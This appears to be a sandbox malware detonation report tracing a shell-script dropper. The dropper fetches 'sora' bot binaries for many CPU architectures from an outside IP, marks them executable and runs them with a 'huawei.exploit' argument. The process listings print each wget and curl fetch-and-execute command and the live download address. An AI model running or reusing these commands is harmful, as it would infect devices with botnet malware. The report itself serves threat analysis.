| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh | N/A |
Processes
/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-651ef097f8d64523b15aeb25ce6a7667-systemd-timedated.service-GRCj0B]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:38
Platform
debian9-mipsel-20240418-en
Max time kernel
31s
Max time network
29s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh | N/A |
Processes
/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-06f749d1c0de454f99971b2221fca269-systemd-timedated.service-alFiuk]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben]
/tmp/robben
[./robben huawei.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |